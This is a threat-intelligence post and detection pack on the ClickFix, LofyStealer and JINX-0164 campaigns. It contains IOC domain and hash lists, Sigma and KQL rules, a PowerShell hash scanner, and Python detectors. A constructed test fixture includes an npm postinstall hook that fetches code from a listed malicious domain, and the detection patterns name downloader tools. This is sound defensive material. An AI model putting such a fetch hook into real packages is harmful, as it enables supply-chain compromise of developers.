
ClickFix, LofyStealer, and JINX-0164: Multi-Vector Social Engineering & Supply Chain Analysis — OTX Pulse Detection Pack

Security Arsenal Team
May 30, 2026
6 min read

Recent intelligence from AlienVault OTX highlights a convergence of sophisticated social engineering and supply chain tactics targeting distinct demographics. Three primary threats have been identified: the ClickFix campaign, which masquerades as image-editing utilities to deliver remote access trojans; LofyStealer, a malware operation specifically weaponized against the Minecraft gaming community; and JINX-0164, a financially motivated actor aggressively targeting the cryptocurrency development sector via LinkedIn recruitment and compromised NPM packages. Despite differing targets, all actors rely heavily on initial access vectors that exploit user trust—fake tools, game mods, and recruiter outreach—before deploying memory-resident payloads designed to evade standard signature-based detection.

Threat Actor / Malware Profile

ClickFix & CastleLoader

  • Adversary: ClickFix
  • Malware Families: CastleLoader, NetSupport RAT, CastleStealer
  • Distribution Method: Disguised as a free image-editing tool ("BackgroundFix"). Uses a "Verify you are human" social engineering lure.
  • Payload Behavior: Copies malicious commands to the clipboard, which users are tricked into executing. Invokes finger.exe to retrieve payloads.
  • C2 & Persistence: Delivers CastleLoader, which subsequently drops NetSupport RAT (C2) and CastleStealer. Establishes persistence via scheduled tasks or registry run keys common to RATs.
  • Anti-Analysis: Utilizes reflective loading techniques to keep payloads off the disk.

LofyGang (LofyStealer)

  • Adversary: LofyGang
  • Malware Families: LofyStealer (aka GrabBot, Slinky), Chromelevator
  • Distribution Method: Social engineering targeting Minecraft players. Distributed as a 53.5MB Node.js loader disguised within legitimate libraries.
  • Payload Behavior: Two-stage attack. Node.js loader injects a 1.4MB native C++ payload directly into memory.
  • Capabilities: Steals cookies, passwords, tokens, credit cards, and IBANs from 8+ browsers. Includes syscall evasion mechanisms.

JINX-0164

  • Adversary: JINX-0164
  • Malware Families: AUDIOFIX, MINIRAT
  • Targeted Industries: Technology, Finance (Cryptocurrency)
  • Distribution Method: LinkedIn phishing (posing as recruiters/business partners), NPM trojan packages, and supply chain compromise.
  • Payload Behavior:
    • AUDIOFIX: Python-based infostealer and RAT targeting macOS.
    • MINIRAT: Lightweight Go-based backdoor.
  • Infrastructure: Uses spoofed domains mimicking Microsoft services (e.g., login.teamicrosoft.com) to harvest credentials.

IOC Analysis

The provided indicators of compromise (IOCs) span multiple vectors requiring immediate operationalization:

  • Network IOCs: Domains such as trindastal.com, login.teamicrosoft.com, and driver-updater.net are critical for blocking at the perimeter. Notably, the ClickFix campaign utilizes non-standard ports (e.g., :688) for payload retrieval, which may bypass standard web filtering if not configured for deep packet inspection.
  • File Hashes: A mix of MD5, SHA1, and SHA256 hashes are provided for the loaders and payloads (e.g., LofyStealer's Node.js loader and JINX-0164's install scripts). These should be loaded into EDR custom indicator lists and SIEM correlation rules.
  • Operational Guidance: SOC teams should prioritize the finger.exe execution chain as a high-fidelity anomaly for ClickFix detection. For JINX-0164, domain awareness regarding typosquatting of Microsoft services is essential.
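The finger.exe chain and the non-standard port described above are more convincing together than apart, and correlating a process event with a later network event from the same host is something a single Sigma rule cannot express. The following is an added example in Python, not part of the original pulse: the event records, hostnames and timestamps are constructed, and only the four ClickFix domains come from the IOC list.

```python
from datetime import datetime, timedelta

# ClickFix domains from the pulse's IOC list; everything else in this file is constructed sample data.
IOC_DOMAINS = {"trindastal.com", "poronto.com", "brionter.com", "giovettiadv.com"}
SHELL_PARENTS = ("\\cmd.exe", "\\powershell.exe", "\\explorer.exe")
WINDOW = timedelta(seconds=60)   # finger.exe must connect out within this long of being launched
FINGER_PORT = 79                 # the only port a legitimate finger client should be talking to

# Constructed Sysmon-style telemetry: a ClickFix-like chain on HOST-A, a benign finger query on HOST-B.
EVENTS = [
    {"ts": "2026-05-30T10:00:03", "host": "HOST-A", "type": "process",
     "image": r"C:\Windows\System32\finger.exe", "parent": r"C:\Windows\System32\cmd.exe"},
    {"ts": "2026-05-30T10:00:05", "host": "HOST-A", "type": "network",
     "image": r"C:\Windows\System32\finger.exe", "dst": "trindastal.com", "port": 688},
    {"ts": "2026-05-30T11:30:00", "host": "HOST-B", "type": "process",
     "image": r"C:\Windows\System32\finger.exe", "parent": r"C:\Windows\System32\cmd.exe"},
    {"ts": "2026-05-30T11:30:01", "host": "HOST-B", "type": "network",
     "image": r"C:\Windows\System32\finger.exe", "dst": "finger.corp.example", "port": 79},
]

def _is_finger(image):
    return image.lower().endswith("\\finger.exe")

def clickfix_chains(events):
    """Return one (host, launch_ts, dst, port, ioc_hit) tuple per finger.exe launch from a shell
    that is followed, on the same host and within WINDOW, by a finger.exe connection to any port
    other than 79. ioc_hit is True when the destination is a known ClickFix domain."""
    hits = []
    launches = [e for e in events if e["type"] == "process" and _is_finger(e["image"])
                and e["parent"].lower().endswith(SHELL_PARENTS)]
    for launch in launches:
        t0 = datetime.fromisoformat(launch["ts"])
        for net in events:
            if net["type"] != "network" or net["host"] != launch["host"] or not _is_finger(net["image"]):
                continue
            delta = datetime.fromisoformat(net["ts"]) - t0
            if timedelta(0) <= delta <= WINDOW and net["port"] != FINGER_PORT:
                hits.append((launch["host"], launch["ts"], net["dst"], net["port"], net["dst"] in IOC_DOMAINS))
    return hits

if __name__ == "__main__":
    for host, ts, dst, port, ioc in clickfix_chains(EVENTS):
        print(f"[!] {host} {ts}: finger.exe -> {dst}:{port}" + ("  (known ClickFix domain)" if ioc else ""))
```

Lowering WINDOW or adding the listed domains as a hard requirement trades recall for precision; the port-79 exclusion alone is what keeps the benign HOST-B query out of the results.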

Detection Engineering

YAML
---
title: Potential ClickFix BackgroundFix Activity
id: 4c8f9a2b-1c3d-4f5e-8b9a-1c2d3e4f5a6b
description: Detects the execution chain associated with ClickFix involving finger.exe or suspicious background fix patterns.
status: experimental
date: 2026/05/31
author: Security Arsenal
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - '\finger.exe'
    ParentImage|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\explorer.exe'
  condition: selection
falsepositives:
  - Legitimate administration usage of finger.exe (rare)
level: critical
tags:
  - attack.execution
  - attack.t1059.001
  - attack.command_and_control
  - attack.t1105
  - c2.clickfix
---
title: LofyStealer Node.js Loader Execution
id: 5d9a0b3c-2d4e-4a6f-9c0b-2d3e4f5a6a7c  # original id contained non-hex characters and was not a valid UUID; regenerate a UUIDv4 before deploying
description: Detects Node.js processes spawning suspicious child processes or loading large memory modules indicative of LofyStealer.
status: experimental
date: 2026/05/31
author: Security Arsenal
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    # must be ParentImage: with Image here, 'all of selection_*' could never match
    ParentImage|endswith:
      - '\node.exe'
  selection_child:
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\rundll32.exe'
  condition: all of selection_*
falsepositives:
  - Legitimate Node.js development workflows
level: high
tags:
  - attack.defense_evasion
  - attack.t1055.001
  - malware.lofystealer
---
title: JINX-0164 Spoofed Microsoft Domain Connection
id: 6e0a1c4d-3e5f-4b7c-8d1c-3e4f5a6b7a8d  # original id contained non-hex characters and was not a valid UUID; regenerate a UUIDv4 before deploying
description: Detects network connections to domains spoofing Microsoft services associated with JINX-0164.
status: experimental
date: 2026/05/31
author: Security Arsenal
logsource:
  category: network_connection
  product: windows
detection:
  selection:
    DestinationHostname|contains:
      - 'teamicrosoft.com'
      - 'live.us.org'
      - 'driver-updater.net'
  condition: selection
falsepositives:
  - Unknown
level: critical
tags:
  - attack.initial_access
  - attack.t1566.002
  - apt.jinx-0164


kql
// Hunt for ClickFix and JINX-0164 Network Indicators
// RemoteUrl can carry a full URL rather than a bare hostname, so substring matching (has_any)
// is used instead of an exact in~ comparison, which would miss "https://trindastal.com/...".
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any ("trindastal.com", "poronto.com", "brionter.com", "giovettiadv.com", "login.teamicrosoft.com", "teams.live.us.org", "live.ong", "driver-updater.net")
    or RemotePort == 688
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl, RemotePort, RemoteIP
| extend MITRE = "Command and Control / Initial Access"

// Hunt for LofyStealer Process Anomalies
// DeviceProcessEvents exposes the child process as FileName; there is no ProcessFileName column.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName =~ "node.exe"
    and (FileName in~ ("cmd.exe", "powershell.exe") or ProcessCommandLine contains "-e ")
| project Timestamp, DeviceName, InitiatingProcessFileName, FileName, ProcessCommandLine, FolderPath
| extend MITRE = "Execution / Defense Evasion"


powershell
# IOC Hunt Script for ClickFix, LofyStealer, and JINX-0164
# Requires Administrator privileges (reads every file on every file-system drive)

$IoCs = @{
    "Hashes" = @(
        "bde21d8be65d31e1c380f2daae2f73c79f3e1f4bca70fb990db6fdf6c3768c92", # ClickFix
        "ed391a16389234f9ebb6727711baaf3e068d7f77c465708fa3e8b7d0565d7fb9", # ClickFix
        "f5dbaa09e60343f252a80d4a313a36ac11442d96b0896022d1a83744e3c11feb", # ClickFix
        "293006cec43c663ccff331795d662c3b73b4d7af5f8584e2899e286c672c9881", # LofyStealer
        "45d4040e76a0d357dd6e236e185aba2eb82420d78640bfd1f3dede32b33931f7", # LofyStealer
        "b6cab0b3aa8e56e2427f486c74588d598ae58bb0cbc0eda6939fe171cb0aed17"  # JINX-0164
    )
    "Domains" = @(
        "trindastal.com", "poronto.com", "brionter.com", "giovettiadv.com",
        "login.teamicrosoft.com", "teams.live.us.org", "live.ong", "driver-updater.net"
    )
}

Write-Host "[+] Scanning for file IOCs..." -ForegroundColor Cyan
$Drives = Get-PSDrive -PSProvider FileSystem | Select-Object -ExpandProperty Root

# Walk each drive once and compare every file's SHA256 against the whole list
# (hashing the drive once per IOC, as a per-hash outer loop would, multiplies the run time by the number of hashes).
# -contains is case-insensitive, so the lowercase IOCs match Get-FileHash's uppercase output.
foreach ($Drive in $Drives) {
    Get-ChildItem -Path $Drive -File -Recurse -Force -ErrorAction SilentlyContinue |
        Where-Object { $_.Length -gt 0 } |
        ForEach-Object {
            $FileHash = Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue
            if ($FileHash -and ($IoCs.Hashes -contains $FileHash.Hash)) {
                Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName) ($($FileHash.Hash))" -ForegroundColor Red
            }
        }
}

Write-Host "[+] Checking Hosts file for malicious domains..." -ForegroundColor Cyan
$HostsPath = "$env:windir\System32\drivers\etc\hosts"
$HostsContent = Get-Content -LiteralPath $HostsPath -ErrorAction SilentlyContinue
foreach ($Domain in $IoCs.Domains) {
    # Escape the dots so the regex matches the literal domain; -match on an array returns the matching lines
    if ($HostsContent -match [regex]::Escape($Domain)) {
        Write-Host "[!] SUSPICIOUS ENTRY IN HOSTS FILE: $Domain" -ForegroundColor Yellow
    }
}

Write-Host "[+] Scan Complete." -ForegroundColor Green


Response Priorities

Immediate (0-24 hours)

  • Block IOCs: Implement immediate blocking of all listed domains and IP addresses on firewalls, proxies, and secure web gateways. Pay special attention to the non-standard port 688 used by ClickFix.
  • Hunt Execution Artifacts: Scan endpoints for the specific file hashes provided. Use the PowerShell script provided to search for the presence of LofyStealer or ClickFix binaries.

Short Term (24-48 hours)

  • Identity Verification: Given the credential theft nature of LofyStealer and the LinkedIn phishing tactics of JINX-0164, initiate forced password resets and MFA challenges for users in high-risk groups (developers, finance) and anyone who may have interacted with the lures.
  • Supply Chain Audit: Review NPM package usage and dependency trees for any references to the typosquatted domains or unusual install scripts associated with JINX-0164.
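One way to carry out the supply chain audit step above is to walk a dependency tree's package.json files and flag lifecycle install hooks that reference the JINX-0164 domains or execute or fetch code at install time. This is an added example in Python, not part of the original pulse: the package names and manifests are constructed, only the domains come from the IOC list, and the patterns are a starting point rather than an exhaustive list.

```python
import json
import os
import re

# Domains attributed to JINX-0164 in the pulse; the rest of this file is constructed sample data.
JINX_DOMAINS = ("teamicrosoft.com", "live.us.org", "live.ong", "driver-updater.net")
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# (pattern, reason) pairs that a package's install hook normally has no business containing.
SUSPECT = [
    (re.compile("|".join(re.escape(d) for d in JINX_DOMAINS), re.I), "JINX-0164 domain"),
    (re.compile(r"\bnode\s+-e\b"), "inline node -e script"),
    (re.compile(r"\b(curl|wget|Invoke-WebRequest)\b", re.I), "downloader in install hook"),
]

def audit_manifest(name, manifest):
    """Return [(package, hook, reason)] for every suspicious lifecycle script in one package.json."""
    findings = []
    for hook, cmd in manifest.get("scripts", {}).items():
        if hook in LIFECYCLE_HOOKS:
            findings += [(name, hook, reason) for pat, reason in SUSPECT if pat.search(str(cmd))]
    return findings

def audit_tree(manifests):
    """manifests: {package_name: parsed package.json}; returns all findings across the tree."""
    return [f for name, m in manifests.items() for f in audit_manifest(name, m)]

def load_node_modules(root):
    """Collect every package.json beneath a node_modules directory into {name: manifest}."""
    found = {}
    for dirpath, _, files in os.walk(root):
        if "package.json" in files:
            try:
                with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                    m = json.load(fh)
            except (OSError, ValueError):
                continue
            found[m.get("name", dirpath)] = m
    return found

# Constructed sample tree: one clean package and one trojanised package with a postinstall hook.
SAMPLE_TREE = {
    "left-pad-ish": {"name": "left-pad-ish", "scripts": {"test": "mocha"}},
    "crypto-utils-helper": {"name": "crypto-utils-helper", "scripts": {
        "postinstall": "node -e \"require('https').get('https://driver-updater.net/i')\""}},
}

if __name__ == "__main__":
    for pkg, hook, reason in audit_tree(SAMPLE_TREE):   # swap in load_node_modules("node_modules") for a real checkout
        print(f"[!] {pkg}: {hook} hook flagged ({reason})")
```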

Long Term (1 week+)

  • Application Allowlisting: Restrict the execution of unsigned Node.js loaders and utilities like finger.exe to only specific, vetted users.
  • Architecture Hardening: Implement strict traffic filtering for non-standard ports. Enhance email filtering to detect LinkedIn-themed social engineering lures targeting developer and crypto-communities.
